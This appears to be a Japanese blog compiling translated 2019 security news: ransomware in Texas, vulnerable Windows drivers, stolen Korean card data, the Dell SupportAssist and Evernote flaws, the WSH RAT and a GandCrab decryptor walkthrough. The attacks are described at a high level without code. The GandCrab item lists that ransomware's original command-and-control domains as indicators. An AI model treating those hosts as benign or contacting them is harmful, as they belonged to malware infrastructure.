 DIRは、"coordinated ransomware attack"(協調型身代金要求型マルウェア攻撃)と呼ばれる件に対する対応を主導しているが、どの組織が影響を受けているのかを公開していない。これはセキュリティ上の懸念からである。
 Elliot Sprehe(当該部署の報道官)は、DIRが影響を受けている自治体の総数を確認しようとしていると、KUT(テキサス大学オースティン校), Austin's NPR Station(【訳注】 NPRはNational Public Radioの略。アメリカ公共ラジオ局と訳される)に告げている。
 「これは、我々が本日これまでに発見したように見えるが、セキュリティ上の懸念から影響を受けた自治体を現在リリースしていない」と、Spreheは、このアメリカ公共ラジオ局に告げている。
 土曜日の更新情報で、DIRは、テキサス州のシステムとネットワークは、この攻撃によって影響を受けていないと発言している。
 詳細が明らかになるまで、この攻撃の張本人であるファイル暗号化マルウェアの株と加害者が要求している身代金額は不明なままである。
 望むべくは、適切なバックアップシステムが実装されており、現在の努力が安全なコピーからデータを復元し、通常に戻すための復元活動であることを。

身代金要求型マルウェアは米国において強大である

 米国において最近、身代金要求型マルウェア事案は増大している。そして、政府の部門がしばしば標的になっている。そして、大変多くの行政機関が身代金の支払いに応じる時、身代金が50万ドル(約5億3000万円)以上なのは常識である。
 セキュリティ企業Malwarebytesの遠隔測定法によるデータは、世界中の他のどの国よりも米国が身代金要求型マルウェア攻撃の対象(世界中のこの事案の53%に及ぶ)になっていることを明らかにしている。
 6月、サイバー犯罪者は、フロリダでの2つの攻撃で、その時点で100万ドルを少し超える価値のBitcoinでの支払いを要求し勝ち取っている。
 他の州の組織(テネシー州コリアーヴィル、ニューヨーク州オノンダガ郡立図書館、ジョージア州ヘンリー郡、ルイジアナ州とアラバマ州学区)も最近、身代金要求型マルウェアによって攻撃されている。
 リンクの地図は、米国の医療、教育、政府組織に影響を与えたファイル暗号化事案を示している。
 これら全ての攻撃で共通することは、バックアップの復元手順であり、サイバー犯罪者に支払いをしないことある。


Windows 10 1903ユーザが、KB4512508をインストールするとエラーが発生するとレポートしている
BleepingComputer : News>Security(2019/08/15)
 膨大な数のユーザが、最新のWindows 10 1903(【訳注】 日本時間2019年5月22日に配信されたバージョン)用KB4512508累積アップデートをインストールすることができない、0x800f0982や0x800f081fのような様々なエラーコードでインストールに失敗すると報告している。

Windows Update KB4512508

 このアップデートをインストールしている時、ユーザは、インストール100%のマークを得るが、次に、エラーコードが表示されると報告(, )している。
 この報告中に見られる最も一般的なエラーコードは、0x800f0982, 0x800f081f, 0x80073701, 0x800f0845, 0x8024200Dである。
 残念ながら、これらエラーコードが意味していることを理解しようとしても、Microsoftが限定的な情報しか提供していないので、いつもながら簡単なことではない。以下は、この件とは直接関連していないMicrosoftサポート記事に基づいた一部のエラーコードに関する出来る限りの説明である。

    ・ 0x800f0982 - このエラーコードは、「デバイスにアジア系言語パックがインストールされている」時に、今までのWindows 10のアップデートで表示される(,
    ・ 0x800f081f - このエラーは、インストレーションメディアが破損、使用不可能、あるいは、ユーザがそのファイルに対する適切なパーミッションを持っていない場合に発生する可能性がある。
    ・ 0x8024200D - このエラーは一般的に完全なインストールをするために複数のダウンロードステップを要求し、それらのステップの一つが失敗した時に表示される。 あなたは、アップデートが中断したところから、このアップデートを継続できるか否か確認するために再起動するか、もう一度やり直すこともできる。

 現時点で、Microsoftはこの問題を認識していない。ユーザに残されている道は、自分自身でこの問題を解決するか、公式の対応が与えられるまでアップデートのインストールを遅らせるかの何れかである。
 ユーザはまた、最新のServicing Stack Update(SSU: サービススタックの更新プログラム)KB4508433が、インストールされているか否かチェックしたいかもしれない。このSSUアップデートは、Windows Updateがインストールに失敗することを防ぐために既知のバグを解決するように設計されている。


Windows 10セキュリティ警告: 40を超えるドライバ中に脆弱性が発見された
BleepingComputer : News>Security(2019/08/10)
 正当なデバイスドライバのセキュリティを解析している研究者達は、少なくとも20のハードウェアベンダからの40を超えるドライバに、特権の昇格を達成するために悪用することのできる脆弱性が含まれていることを発見した。
 ハードウェアはソフトウェアが存在するコンピュータの構成要素を意味する。ドライバは、オペレーティングシステムがハードウェアコンポーネントを識別し、それらと相互作用することを可能にするものである。
 ドライバコードは、OSカーネルとハードウェア間のコミニケーションが可能になり、システムの通常ユーザや管理者よりも高いパーミッションレベルを享受できる。
 それ故、ドライバ中の脆弱性は、悪意ある行動主体がカーネルへのアクセスを獲得し、オペレーティングシステムのより高い権限を獲得することによって脆弱性攻撃をすることができるので緊急の問題である。
 ドライバはまた、ハードウェアファームウェアをアップデートするためにも使用されるが、ドライバはOSの範囲外であるより深いレベルで動作するコンポーネントに到達し、機能を変更したり、それらをブロックしたりすることさえできる。
 例えば、BIOSとUEFIファームウェアは、あなたがコンピュータを起動した時に、オペレーティングシステムの前に起動するローレベルソフトウェアである。このコンピュータに植え付けられたマルウェアは、殆どのセキュリティ ソリューションにとって不可視であり、OSを再インストールしても削除することはできない。

ドライバは信頼されている

 ファームウェアとハードウェアのセキュリティ企業Eclypsiumの研究者達は、ユーザ空間からカーネルパーミッションに特権を昇格するために悪用される可能性のある40を超えるドライバを発見した。
 影響を受ける企業(リストは、この記事の末尾)は、全てのメジャーなBIOS企業と、ASUS, Toshiba, Intel, Gigabyte, Nvidia, Huaweiのようなコンピュータハードウェア業界のビッグネームを含んでいる。
 「これら全ての脆弱性は、プロセッサとチップセットI/O空間、モデル固有レジスタ(MSR)、制御レジスタ(CR)、デバッグレジスタ(DR)、物理メモリとカーネル仮想メモリへの読み込みと書き込みアクセスのような、ハードウェアリソースへの高い特権でのアクセスを実行するためのプロクシとして挙動することを可能にする。」(Eclypsiumより)  カーネルから、攻撃者はファームウェアとハードウェア インターフェースに移動し、OSレベルで動作する通常の脅威防御製品の検出能力を超えてターゲットホストをセキュリティ侵害することができる。


ソース: Linagora Engineering

 Windowsにドライバをインストールするには、管理者権限が要求され、Microsoftによって認証された信頼される企業からである必要がある。このコードはまた、信頼性を証明するために正当な認証機関によって署名されたものでもある。署名が欠けていると、Windowsはユーザに警告を発生する。
 しかしながら、Eclypsiumの研究は、Windowsによって受け入れられた有効な署名の付いた正当なドライバに言及している。これらのドライバは、悪意があるように設計されてはいないが、悪意あるプログラムと行動主体によって悪用されることができる脆弱性を含んでいる。
 さらに悪いことに、これらのドライバは、Windows 10を含むWindowsの全ての最先端のバージョンに影響を与える。

 「この問題は、Microsoft Windowsの全ての最先端のバージョンに適用され、Windowsマシンを、これら既知の不良ドライバの一つをロードしないようにするための普遍的なメカニズムは現在存在していない。」

 この研究者達は、脆弱性のあるドライバの中に、グラフィックカード、ネットワークアダプタ、ハードドライブ、その他のデバイスと相互作用するドライバを発見したと発言している。

リスクは仮説ではない

 これらのコンポーネントに植え付けられたマルウェアは、「格納されたり、表示されたデータを読み込み、書き込み、リダイレクトすることや、ネットワーク越しに送信することが可能である。」 更に、このコンポーネントは、システムでサービスの拒否状態(denial-of-service)を引き起こすために無効化することができる。
 脆弱性のあるドライバを悪用する攻撃は、理論上でしか存在しないものではない。これらは資金の豊富なハッカーによるサイバースパイ活動中で特定されている。
 Slingshot APTグループ(【訳注】 非常に高度なサイバースパイ活動グループ)は、感染したコンピュータ上で特権を昇格するために古い脆弱性のあるドライバを使用した。APT28(別名: Sednit, Fancy Bear, Strontium Sofacy)のLojaxルートキットは、署名されたドライバを介してUEFIファームウェア中に格納されたため、より狡猾なものであった。
 Windowsの全ての最先端のバージョンは、この問題の影響を受ける。そして、脆弱性のあるドライバのロードを防ぐためのより広範な規模でのメカニズムは存在していない。
 攻撃のシナリオは、既に脆弱性のあるドライバをインストールしているシステムに限定されるわけではない。脅威の行動主体は、特権の昇格と永続目的のために、それらを追加することができる。
 この脅威を軽減する解決策には、期限切れのシステムおよびコンポーネントファームウェアに関する定期的なスキャンと、脆弱性を解決するためにデバイスメーカーからの最新のドライバー修正プログラムを適用することが含まれる。
 以下は、影響を受ける企業のリストの一部である。他の企業の一部は、依然として記事差し止めの下にある。

American Megatrends International (AMI)
ASRock
ASUSTeK Computer
ATI Technologies (AMD)
Biostar
EVGA
Getac
GIGABYTE
Huawei
Insyde
Intel
Micro-Star International (MSI)
NVIDIA
Phoenix Technologies
Realtek Semiconductor
SuperMicro
Toshiba


韓国の100万を超えるペイメント・カードの詳細がダークWebで売られていた
BleepingComputer : News>Security(2019/08/03)
 韓国から収集された盗まれたペイメントカード(【訳注】 クレジットカードやデビットカード等支払い機能のついたカードの総称)の詳細の数は、過去二ヶ月で急増し、100万を超える記録がダークWebで販売用に供されていた。

韓国のカード記録の猛烈な増加

 6月、研究者達は、5月に確認されていた42,000から尋常でない増加をし、230,000レコードが売られていることに気づいた。そして、これは通常観測された量と一致していた。次の月には、レコード数は890,000以上にまで増加していた。
 このセキュリティ侵害の源は、現時点で未知のままであるが、このデータは、韓国における多くの事業者でのカード提示取引からのものである。
 これらのサービスは複数の販売業者の支払いデバイスと連動しているので、これは、point-of-sale(PoS、【訳注】 販売情報を即時に管理するシステム)統合装置が晒されたという理論を補強している。


100万を超えるカード提示取引レコード(画像をクリックすると拡大します)

需要は価格を粗2倍にしている

 韓国の支払い記録は、犯罪者達が利用できる多大な供給を持っていたため、昨年度の需要は低調であったと、サイバー犯罪フォーラムでカード関連行動を監視しているGemini Advisoryの研究者達は発言している。2019年、これは、供給は同じで、需要は増加に変化した。
 現在の状況はまた、カードの平均価格を上昇させた。昨年、韓国のカード提示取引の記録は、平均24$で売られていた。
 今年の需要の増加で現金化しようとした場合、一つの支払いカードの記録は、平均40$と大変高価になっていた。

米国のカード所有者も影響を受けている

 この研究者達からの別の観測として、セキュリティ侵害された韓国の記録の3.7%は、アメリカで発行されたカードであった。

 「最も影響を受けている米国の金融機関の一つは、アメリカ空軍に奉仕している信用組合である。空軍は韓国に複数の空軍基地を維持している」と、Gemini Advisoryは発言している。

 セキュリティ侵害されたデータを注視してみると、カードの多くは韓国を訪問したことのある米国の所有者に属していることが明らかになった。


セキュリティ侵害されたカードの国別TOP 5(注:日本も存在しています)

 カード提示取引から支払いデータの詳細を盗むことは、一般にPoSデバイスに接続しているシステム上にマルウェアを植え付けることで実行される。多くの重大事案において、攻撃ベクトルは、Defaultもしくは推測が容易なパスワードで保護されているリモートデスクトップ接続であった。
 この方法でインストールされたマルウェアは、顧客が購入するためにカードを使用している時に、支払いデータはRAMに格納されるので、支払いデータをコピーすることができる。これが可能なのは、カード情報がRAM中で暗号化されていないからである。


WeTransferにセキュリティ上の重大事案: 別人にファイルを送信
BleepingComputer : News>Security(2019/06/21)
 不愉快なセキュリティ上の重大事案、WeTransferファイル共有サービスは、2日に渡り、ユーザ共有ファイルを別人に送信していたとアナウンスした。このサービスは、プライベート、機密ファイルと考慮されているものを転送するために使用されるので、この問題は、影響を受けるユーザにとっては大変なプライバシー問題になる可能性がある。
 今日から、ユーザは、6月16,17日の両日、WeTransferサービスを使用して送信されたファイルは、送信者が意図していない人々にも配信されたと述べるWeTransferからのメール[1, 2, 3]を受け取り始めた。
 このe-Mailによると、このチームは何が発生しているか分からず、この状況を封じ込めるために作業していると発言している。


WeTransferユーザに送信されたe-Mail(画像をクリックすると拡大します)

 このe-Mailの完全版は以下である。

WeTransferユーザー諸氏
 セキュリティ上の問題に関して、WeTransferサービスのe-Mailが別人に送信されていたことをお知らせします。 これは6月16日と17日に発生しました。 我々のチームは、この状況を修正して封じ込め、それがどのように起こったのかを発見するために精力的に作業してきました。
 送信または受信した転送が一部の人にも配信されていることがわかりました。 我々の記録では、これらのファイルが、アクセスされたことが示されていますが、その殆どは意図されている受信者によってアクセスされています。 それにもかかわらず、予防措置として、これ以上のダウンロードを防ぐためにリンクをブロックしました。
 あなたのe-Mailアドレスは転送されたe-Mailにも含まれているので、あなたが受け取る疑わしい、もしくは、通常ではないe-Mailに注意してください。
私達は、あなたのデータがいかに重要であるかを理解しています。当然のことですが、私たちのサービスに対するあなた方の信頼を決して無駄にしません。 質問や懸念がある場合は、このe-Mailに返信し、サポートチームに連絡してください。

WeTransfer Team

 WebTransferは、彼らのWebサイトで、アカウントの一部はログアウトされ、パスワードはアカウントを保護するためにリセットされた。そして、この重大事案に巻き込まれたTransferリンクへのアクセスはブロックされているとするセキュリティ通知をポストしている。
 「この重大事案は、6月16,17日に発生した。発見されるやいなや、我々はユーザを保護するための予防的なセキュリティ対策を講じた」 続けて、「これは、ユーザが、彼らのアカウントをログアウトされ、彼らのアカウントを防御するためにパスワードのリセットが要求されることを意味している。更に、我々のユーザのTransferのセキュリティを確保するためにTransferリンクをブロックした」と、Wetransferはセキュリティ通知で述べている。
 これが単純なWebTransferのプログラミングのミスであるというのなら、彼らがユーザのパスワードをリセットしたり、ユーザを保護する必要性を感じていることは奇妙である。これは、彼らのネットワークが侵害されたような、もっと深刻な問題である。
 BleepingComputerは、この重大事案に関してWebTransferに接触したが、この記事を公開した時点で、回答を耳にしていない。


同梱されているシステム健全性ソフトウェアのフローにより、数百万のDell PCに攻撃に対する脆弱性
Bitdefender : Hot For Security(2019/06/22)
 Windowsを稼働している数百万のDell PCとラップトップに大変深刻なセキュリティホールを介して攻撃される脆弱性が存在している。この脆弱性は、悪意あるハッカーによって攻撃されるとデバイスをハイジャックされ制御される可能性がある。
 DellのWebサイト上で公開されたサポート アドバイザリによると、Dellは、この問題がサードパーティーのコンポーネントであるSupportAssist(DellのホームユーザとビジネスPCに同梱されているトラブルシューティング ソフトウェア)中にあると明らかにしている。このソフトウェアは、Dellが「業界初の自動化された予防的および予測的サポート技術」と説明しているソフトウェアである。
 その宣伝資料で、DellはSupportAssistが「あなたのシステムのハードウェアとソフトウェアの健全性を予防的にチェックする」と主張している。問題が検出されると、必須のシステム状態情報が、トラブルシューティングを開始するためにDellに送られる。Dellは、コストのかかる問題にならないように対話で解決するために、あなたに接触してくる。」
 しかしながら、セキュリティ研究者Peleg Hadarは、SupportAssistのPC Doctorコンポーネントに、DLLがハイジャックされる脆弱性が含まれていることを発見した。このDLLハイジャックの脆弱性は、攻撃の間に、システムレベル権限を取得される可能性がある
 このメカニズムを介して、ハッカーは簡単にターゲットのコンピュータの制御を獲得することができる。
 SupportAssistソフトウェアは数百万のDellのPCとラップトップにプレインストールされているので、オンライン犯罪者が、このフローを悪用しようとする多くの刺激が存在している。
 もっと悪いことに、Dellは、この脆弱性を含むこのソフトっウェアを実際には作成していない。このソフトウェアは、ネバダ州を本拠とする診断ソフトウェアのスペシャリストPC Doctorによって書かれている。PC Doctorは、彼らの技術を他のPCメーカーにライセンスし、そのメーカーのPCやラップトップに同梱してもらっている(リブランド、商標変更)。
 Hadarによると、他に影響を受ける製品には以下が含まれる。

PC-Doctor Toolbox for Windows
CORSAIR ONE Diagnostics
CORSAIR Diagnostics
Staples EasyTech Diagnostics
Tobii I-Series Diagnostic Tool
Tobii Dynavox Diagnostic Tool

 この問題の大きさは、Dellの顧客以上に広がるだろう。PC Doctorは、そのWebサイトで以下のように述べている。「大手コンピュータメーカーは、世界中のコンピュータシステムに一億を超えるWindows用PC Doctorをプレインストールしている。」
 Hadarは4月29日にDellに対してこの脆弱性を通知している。彼は5月21日に、この問題を確認し詳細をPC Doctorに転送している。パッチは5月28日にDellによって発行された。これは、自動アップデートを受け取る設定にしている全てのDellコンピュータは、既にパッチされていることを意味している。
 彼らのコンピュータが脆弱性があるかもしれないと懸念しているDellユーザは、PCやラップトップにインストールされているSupportAssistのバージョンをチェックする必要がある。Business PC用のDell SupportAssistバージョン 2.0.1と、Home PC用のDell SupportAssistバージョン 3.2.2は、このセキュリティホールに対する脆弱性は存在しないと言われている。
 しかしながら、あなたのDellコンピュータが自動アップデートをONにしていないのであれば、あるいは、あなたが、この脆弱性のあるコードを実行している他のブランドのコンピュータを所有しているのであれば、まさに今、行動しアップデートを適用しなさい。


GandCrab 5.2復号ツールのリリースは、邪悪な身代金要求型マルウェア物語を終わらせる
BleepingComputer : News>Security(2019/06/17)
 世界中の法執行機関の協力のもとでBitdefenderは、GandCrab身代金要求型マルウェアのバージョン1,4, 5から5.2で暗号化されたファイルを復号する復号ツールのアップデート版をリリースした。
 Bitdefenderと欧州刑事警察機構のアナウンスによると、GandCrab身代金要求型マルウェア用の復号ツールは、この身代金要求型マルウェアの最新版を復号する。

 「このツールは、オーストリア (Bundeskriminalambt-BMI), ベルギー (Federal Computer Crime Unit), ブルガリア (Bulgarian Cybercrime Unit), フランス (Police Judiciaire de Paris-Befti), ドイツ (LKA Baden-Wurttemberg), オランダ (High Tech Crime Unit), ルーマニア (DIICOT), イギリス (NCA and Metropolitan Police), 米国 (FBI), 欧州刑事警察機構の法執行機関と民間のBitdefenderとの協働でリリースされた。」

Bitdefenderによる今迄のGandCrab身代金要求型マルウェア用の復号ツールと類似して、このツールは暗号化アルゴリズム中の欠陥に起因して可能にするものではない。代わりに、法執行機関と協働したこのセキュリティ企業は、犠牲者のファイルを復号するために必要な復号キーをダウンロードするためにGandCrabのコマンド&コントロールサーバーへのアクセスを取得する。
 GandCrab復号ツールの使用方法に関する説明は、この記事の末尾にある。あなたが何らかの支援を必要としているのであれば、気兼ねせず、この記事、もしくは、我々のGandCrab Support and Helpフォーラムのトピックにコメントを残しなさい。

GrandCrabの盛衰

 BleepingComputerは、GandCrabがExploit.inのようなハッカーフォーラムでアフィリエイトとしての身代金要求型マルウェア(Ransomware-as-an-Affiliate)システムを介して拡散し始めた2018年1月28日の最初のリリース以来、ずっとGrandCrabを追い続けてきた。
 最初のリリース時、GandCrab身代金要求型マルウェアは、RIG脆弱性攻撃キットを介して拡散し、犠牲者のファイルを暗号化し、それらファイルの名前に .GDBC 拡張子を追加していた。


当初のGandCrab脅迫文(画像をクリックすると拡大します)

 GandCrabの開発者達は、身代金要求型マルウェアを監視している研究者や組織を愚弄する傾向を持っていた、そして、最初のリリースも違いはなかった。
 最初のリリース時、GandCrab開発者達は、彼らの実行ファイル内に、身代金要求型マルウェアを追跡しているBleepingComputerや他の組織に因んだ名前を彼らのコマンド&コントロールサーバの一つに名付けることで、愚弄するメッセージをBleepingComputerに送ってきた。
 これらのオリジナルコマンド&コントロールサーバは以下である。

bleepingcomputer.bit
nomoreransom.bit
esetnod32.bit
emsisoft.bit
gandcrab.bit

 それ以来、我々は、彼らの最終リリースバージョン5.2まで、GandCrabチームがリリースする複数のバージョンを追跡してきた。


GandCrab 5.2脅迫文(画像をクリックすると拡大します)

 GandCrabチームは、コマンド&コントロールサーバがハッキングされたり、研究者が復号ツール[1, 2, 3]をリリースしたりと幾つかの障害にぶつかったが、彼らが今月撤退をアナウンスした時、巨大な収益を上げたと主張している。
 ハッカーフォーラムExploit.inへの撤退投稿において、この身代金要求型マルウェア開発者達は、身代金の支払いで20億ドル(約2155億円)稼ぎ、個人あたりの収益は1億5000万ドル(約162億円)だと主張している。


GandCrab撤退報告(画像をクリックすると拡大します)

 この復号プログラムのアップデート版のリリースで、GandCrab身代金要求型マルウェアの寿命は、公式に終焉し、ユーザは現在、無料で彼らのファイルを取り戻すことができる。

GrandCrabで暗号化されたファイルを復号する方法

 GandCrab身代金要求型マルウェアの v1, v2, 5-5,2に感染しているのであれば、あなたは、Bitdefenderによってアップデートされた復号プログラムを使用して無料でファイルを取り戻すことができる。
 最初に、以下のダウンロードリンクからBDGandCrabDecryptTool.exeファイルをダウンロードする。

BDGandCrabDecryptTool.exeファイルのダウンロード

 ダウンロードしたら、このプログラムをダブルクリックすると、使用許諾書が表示されるので、これを受け入れる。
 この復号プログラムが起動すると、マシンがインターネットに接続されている必要があるとする注意が表示される。これは、この復号プログラムが、あなたの復号キーをチェックし、それをダウンロードするためにBitdefenderのサーバに接続する必要があるためである。


インターネット接続を必要とするメッセージ

 これで、メインのGandCrab復号プログラムの画面が表示される。この時点で、あなたはコンピュータ全体を復号するのか、それとも特定のフォルダを復号するのかのオプションを持つことになる。


BitdefenderのGandCrab復号プログラム(画像をクリックすると拡大します)

 私は、このプログラムが間違いなく動作することを確認するために、最初にこの復号プログラムでファイルを復号テストするように提案する。きちんと動作したら、コンピュータ全体を復号するために"Scan entire system"を選択しなさい。
 あなたが望むオプションを選択したら、復号を開始するために、Start Toolボタンをクリックしなさい。
 復号プロセスが開始されると、この復号プログラムは、特定の情報を取得するために脅迫文を探す。この情報はBitdefenderのサーバにアップロードされる。キーが発見されると、この復号プログラムに送り返される。


復号キーを取得中(画像をクリックすると拡大します)

 復号キーが取得されロードされると、この復号プログラムは、あなたのコンピュータ上のファイルの復号を開始する。あなたは、この復号プログラムのスクロールバーを使用して進捗状況を追跡することができる。


GandCrabで暗号化されたファイルを復号中(画像をクリックすると拡大します)

 終了すると、この復号プログラムは、終了を宣言し、何らかの問題があることをあなたに警告する。
 問題がある場合には、ログファイルへのリンクをクリックすると、%Temp%\BDRansomDecryptor\BDRansomDecryptor\BitdefenderLog.txt ログファイルが自動的に開く。このファイルは、復号されたファイルと復号できなかったファイルの概要を含んでいる。


終了した復号プログラム(画像をクリックすると拡大します)

 例えば、我々の例では、この復号プログラムは、10ファイルを除く全てのファイルを復号した。幸いなことに、これらのファイルは、アプリケーションを再インストールすることで再作成されたアプリケーション特定のファイルであった。
 この復号プログラムの動作に何らかのトラブルがあった場合には、此処、もしくは、我々のGandCrab Support and Helpフォーラムトピックの60ページに、気兼ねせずコメントを残しなさい。


新しいWSH RATマルウェアは銀行の顧客をキーロガーで狙っている
BleepingComputer : News>Security(2019/06/14)
 セキュリティ研究者は、リモートアクセス・トロイ(RAT)を拡散させ、市中銀行の顧客をキーロガーと情報探索型マルウェア(information stealer)で積極的に狙っているフィッシングキャンペーンが進行中であることを発見している。
 この新しいマルウェア(その作成者によってWSH Remote Access Tool (RAT)と名付けられている)は、2013年に最初に作成され拡散したVBS(Visual Basic Script)を基にしたHoudini Worm (H-Worm)の亜種である。
 そのうえ、JavaScriptに移植され、そのコマンド&コントロールサーバ(C2)サーバと通信する時、様々なユーザエージェント文字列と区切り文字を使用しているが、WSH RATは、基本的にH-Wormと同一である。

「機能」が満載されたWHS RAT

 この新しいRATを発見した一つであるCofenseの研究チームは「WSHは、おそらくWindowsマシンでスクリプトを実行するために使用されるアプリケーションである正当なWindows Script Hostを参照している」と発言している。
 更に、WSH RATは、その開発チームによって大々的に売り出されており、6月2日にリリースされただけで、悪意あるURL、並びに、MHT、ZIPの形式でのフィッシングキャンペーンを介して積極的に拡散している。


フィッシングe-Mailのサンプル

 このRATは、バイヤーが、彼らの標的のコンピュータを遠隔からコントロールする、ファイルをアップロード・ダウンロード・実行する、並びに、リモートスクリプトとコマンドを実行するために、犠牲者のWebブラウザやe-Mailクライアントからパスワードを盗む攻撃能力を発動することを可能にしている。
 このRATはまた、キーログする能力も特徴としている。これは、アンチマルウェア・ソリューションを殺し、Windows UACを無効にすることを可能にする。また、全ての侵害された犠牲者に対して一括してコマンドを発行するオプションも付いている。
 今まさに、その作成者はサブスクリプションベース・モデル(【訳註】提供する商品やサービスの数ではなく、利用期間に対して対価を支払う方式のことで、多くの場合「定額制」と同じ意味で用いられる。(IT用語辞典バイナリより))で販売中である。全ての機能は、一月50$支払う顧客のために開放されている。


WSH RATサブスクリプション情報

WHS RATフィッシングキャンペーン

 最初に説明したように、WHS RATの悪意あるe-Mail添付ファイル(URL、ZIP、MHTフォーマット)を配布するフィッシング攻撃は、RATペイロード(【訳註】悪意の総量の意味)を含むZIPaアーカイブをダウンロードさせるために市中銀行の顧客をリダイレクトすることによって積極的に彼らを狙っている。
 ターゲットが引き金を引くと、悪意あるペイロードが、H-Wormと同じ設定構造とコマンド&コントロールサーバ通信基盤を使用してターゲットのコンピュータにダウンロードされる。
コマンド&コントロールサーバーに接触すると、WHS RATは、第二段階の部分として、更に三つの悪意あるペイロードをPE32実行ファイルの形式(camouflaged as .tar.gzアーカイブ)で犠牲者の侵害したマシン上にダウンロードし投下する。


第二ステージの悪意あるペイロードのダウンロード(画像をクリックすると拡大します)

 三つの悪意あるツールは、キーロガー、メール認証情報ビューアー、ブラウザ認証情報ビューアーであり、何れも、サードパーティーによって開発され、認証情報と他の重要な情報を収集するために、このキャンペーンのオペレータが使用している。
 Cofenseの研究者達が発見したように、「Hwormの焼き直しは、脅威のオペレータが、今日のIT環境で未だ機能するテクニックを再使用する意思があることを証明している。」
 また、「MHTファイルを含む .ZIP を配布するフィッシングキャンペーンは、Symantec Messaging Gatewayのウィルスとスパムチェックをバイパスすることが可能であり」、成功裏にそのターゲットに感染していた。
 URL、IPアドレス、およびMD5マルウェアサンプルのハッシュを含む侵害の兆候(IOC)のリストは、CofenseのWSH RATレポートの末尾に提供されている。 


Evernoteアドオンの緊急のフローは数百万の重要なデータを漏洩させる
BleepingComputer : News>Security(2019/06/12)
 Evernote Web Clipper Chrome拡張中の緊急のフローは、潜在的に攻撃者がサードパーティのオンラインサービスからユーザの重要な情報にアクセスする可能性があった。
 「Evernoteの人気の高さに起因して、この問題は、この拡張を使用している利用者と企業(発見した時点で、約460万ユーザ)に影響を与える可能性があった」と、この財弱性を発見したセキュリティ企業Guardioは発言している。

ユニバーサル・クロスサイトスクリプティング・フロー

 このセキュリティ問題は、CVE-2019-12592として追跡されるユニバーサル・クロスサイトスクリプティング(UXXS、別名 Universal XSS)であり、「Webブラウザの同一生成元ポリシーをバイパスし、攻撃者にEvernoteドメイン外からIframe中でのコード実行権限を承認する」Evernote Web Clipperのロジカル・コーディング・エラーから発生しているものである。
 Chromeのサイト分離セキュリティ機能が無効にされると、他のWebサイトのアカウントからのユーザデータは最早保護されず、悪意ある行動主体はサードバーティーのサイトから「認証、金融、ソーシャルメディアでの個人的な会話、個人のe-Mail等を含む」重要なユーザ情報にアクセスすることを可能にする。


このフローへの攻撃

 これは、ターゲットを、標的にされているサードパーティのWebサイト付きの非表示のiframeをロードし、ロードする全てのiframeに悪意あるペイロード(「クッキー、証明書、個人情報を盗み、ユーザとしての行動を実行する」)を挿入することをEvernoteに強いるように設計された攻撃の引き金になるハッカーがコントロールしているWebサイトにリダイレクトすることによって実行される。
 Guardioは、脆弱性のあるEvernote Web Clipper Chrome拡張を使用して、あらゆる人のソーシャルメディア、財務情報、ショッピングデータ、プライベートなメッセージ、認証データ、e-Mailへのアクセスを取得する方法をデモするCVE-2019-12592フロー用の実用的な概念の照明(PoC)を設計している

Evernote Web Clipper UXSS脆弱性は既に修正されている

 Evernoteは、5月27日のGuardioの責任ある公開報告を受けた週にこの脆弱性を完全にパッチし、5月31日全てのユーザに対してこの修正を公開した。6月4日、このパッチは完全に機能することが確認されている。EvernoteのWeb Clipper Chrome拡張のパッチされたバージョンを使用しているか否か確認するには、Evernote Chrome拡張のページ(chrome://extensions/?id=pioclpoplcdbaefihamjohnefbikjilc)に進み、バージョン7.11.1以降がインストールされていることをチェックしなさい。
 Guardio CTOのMichael Vainshteinは、「我々が発見した脆弱性は、ブラウザの拡張機能を細心の注意を払って精査することの重要性を証明するものである」と発言している
 更に、「必要なのは、あなたが実行したりオンラインに格納したりしているものを侵害するための危険な拡張一つだけである。波及効果は即時であり激しいものである。」
 2017年、Evernoteは、多大なユーザの反発から、彼らのスタッフがユーザの暗号化されていないメモを読むことを可能にしていたプライバシーポリシーに対して提案していた「改善」を撤回しなければならなかった
 より最近の出来事としては、4月中旬、Evernoteは、攻撃者がローカルに格納されたアプリケーションや標的にしているMac上のファイルを遠隔から実行することを可能にするパストラバーサル脆弱性(【訳註】WebアプリケーションのURLやそのパラメータに特定の文字列を与えることで、非公開のディレクトリやファイルにアクセスできてしまう脆弱性(security.c-inf.comより))を修正している。


Windows 10アプリケーションが、Adブロッカーが絶対に止めることができない悪意ある広告に襲われている
BleepingComputer : News>Security(2019/06/03)
 ドイツのWidnows 10ユーザ達は、コンピュータを使用している間に、彼らのDefaultブラウザが突然悪意ある広告とスカムを開くとレポートしている。これらの広告は、広告をサポートするアプリケーション中に表示されるMicrosoft Advertisingネットワーク上での悪意あるキャンペーンによって表示される。
 無料のアプリケーションを収益化するための方法として、Microsoftは、Windows 10アプリケーション開発者に、彼らのアプリケーション中に広告を表示するためにMicrosoft Advertising SDKを使用する能力を提供している。例えば、Microsoft NewsとMicrosoft Jigsawは、広告を表示するためにMicrosoft Advertisingを活用している。


Microsoft NewsとMicrosoft Jigsawのドイツ語広告(画像をクリックすると拡大されます)

 週末に渡り、突然技術サポートスカム、富くじ、アンケート調査詐欺、商品ルーレットでの当選を押し付けてくるサイトを開いたとするドイツのWindows 10ユーザからの多くのレポート[1, 2, 3]があった。このような広告は、彼らがMicrosoft News, Microsoft Jigsaw, 他のMicrosoft Advertisingをサポートしているアプリケーションのようなアプリケーションを使用している間に突然開いている。
 例えば、以下の広告は、あるユーザに対して示されたものであり、コンピュータが感染していると述べるシステムスキャンを装っている。ユーザが、このスクリーンを経由すると、スカムページは、最終的に不要なシステムクリーナープログラムをダウンロードするように促してくる。


悪意ある広告キャンペーンで表示される技術サポートスカム(画像をクリックすると拡大されます)

 これらの広告は、新しいウィンドウで自動的にスカムサイトを起動するためのJavaScriptを使用するMicrosoft Advertisingネットワークで広告キャンペーンを購入したスカマーによって発生させられている。これらの広告は広告サポートアプリケーション中に表示される時に、Windows 10は、代わりにDefaultブラウザに新しいページを起動する。
 4月に、Microsoftアプリケーションのフランスのユーザをターゲットにした類似の悪意ある広告キャンペーン同様に、このドイツでのキャンペーンは、レジデンシャルIPアドレス上のユーザのみをターゲットにしているようである。例えば、ドイツのIPアドレスへのアクセスを取得するためにVPNを使用しているなら、この悪意ある広告は表示されない。

Adブロッカーは役に立たない

 これらの広告は広告サポートアプリケーションのために表示されているので、あなたのブラウザにインストールされている如何なるAdブロッカーも、このページの読み込みを防ぐことはない。
 これは、Adブロッカーによって通常ブロックされるスクリプトが、このアプリケーションによって使用されているため、Windows 10は、ブラウザにWebページを読み込むことになる。
